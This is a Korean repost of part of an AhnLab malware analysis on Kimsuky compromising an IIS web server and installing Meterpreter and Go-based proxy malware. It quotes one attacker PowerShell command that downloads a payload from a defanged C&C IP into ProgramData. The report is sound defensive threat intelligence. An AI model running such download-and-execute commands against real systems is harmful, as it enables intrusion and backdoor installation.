* 출처는 안랩입니다.

* 아래는 내용중 일부입니다.

북한 공격 그룹 김수키(Kimsuky)가 또다시 말썽을 부리고 있다. 

웹 서버 공격에 성공한 이후 메타스플로잇 미터프리터(Metasploit Meterpreter) 백도어 또는 고(Go) 언어로 개발된 

프록시 악성코드를 설치한다는 특징이 있다. 

이번 글에서는 웹 서버를 공격하는 김수키 공격 사례를 자세히 알아본다.

이번 공격 사례에서는 김수키가 국내 건축사무소의 취약점이 패치되지 않았거나 부적절하게 관리되고 있는 윈도우 IIS 웹 서버를 노린 것으로 확인된다. 공격자는 IIS 웹 서버를 공격해 파워셸(PowerShell) 명령을 실행했다. 

[그림 1]은 ASD(AhnLab Smart Defense) 로그, 윈도우 IIS 웹 서버 프로세스인 w3wp.exe가 파워셸을 이용해 외부에서 추가 페이로드를 다운로드하는 것을 보여준다.

[그림 1] IIS 웹 서버 프로세스가 파워쉘 명령을 실행하는 로그

실행된 파워셸 명령은 아래와 같다. 다운로드된 파일 “img.dat”은 메타스플로잇 미터프리터 백도어 악성코드이다.

> powershell.exe invoke-webrequest -uri “hxxp://45.58.52[.]82/up.dat” -outfile “c:\programdata\img.dat”

공격자는 미터프리터를 이용해 프록시(Proxy) 악성코드를 추가 설치했으며, 여기에도 파워셸 명령이 사용됐다.

[그림 2] 미터프리터에 의해 설치되는 프록시 악성코드

파워셸 명령으로 다운로드된 미터프리터 악성코드

메타스플로잇은 침투 테스트 목적의 프레임워크이다. 기업이나 기관의 네트워크 및 시스템에 대한 보안 취약점을 점검하는 데 사용되는 툴로, 침투 테스트 단계별로 다양한 기능을 지원한다. 미터프리터는 메타스플로잇에서 제공하는 백도어 악성코드로, 공격자의 명령을 받아 여러가지 악성 행위를 수행한다. 

오픈소스인 메타스플로잇은 접근성이 좋아 김수키 공격 그룹을 비롯해 다양한 공격자가 꾸준히 사용한다. 과거 분석팀에서도 김수키가 미터프리터를 애플시드(AppleSeed) 악성코드와 함께 공격에 사용한 사례들을 소개했다.

참고로 이번 공격에 사용된 C&C 주소 외에 regsvr32.exe 프로세스를 통해 악성코드를 실행하는 방식도 김수키가 과거부터 사용해온 것과 동일하다. 공격에 사용된 악성코드는 DLL 포맷으로, regsvr32.exe 프로세스에 로드되어 동작한다.

[그림 3] regsvr32.exe 프로세스에 로드되어 동작하는 미터프리터

기존과 다른 점이 있다면, 미터프리터의 스테이저(Stager) 악성코드가 고 언어로 개발됐다는 점이다. 과거 김수키는 미터프리터 스테이저를 자체 제작한 형태 또는 VMProtect와 같은 패커로 패킹해 유포했다. 다음 문단에서 소개할 프록시 악성코드 또한 고 언어로 개발된 것으로 미루어 보아, 최근에는 악성코드를 유포할 때 진단을 우회하기 위해 고 언어를 많이 사용하는 것으로 추정된다.

[그림 4] 고 언어로 개발된 미터프리터 스테이저 악성코드

* 전체내용은 아래에서 확안하세요.

https://www.ahnlab.com/kr/site/securityinfo/secunews/secuNewsView.do?seq=33530&utm_source=CM&utm_medium=eDM&utm_campaign=SL%5FtypeC&utm_content=969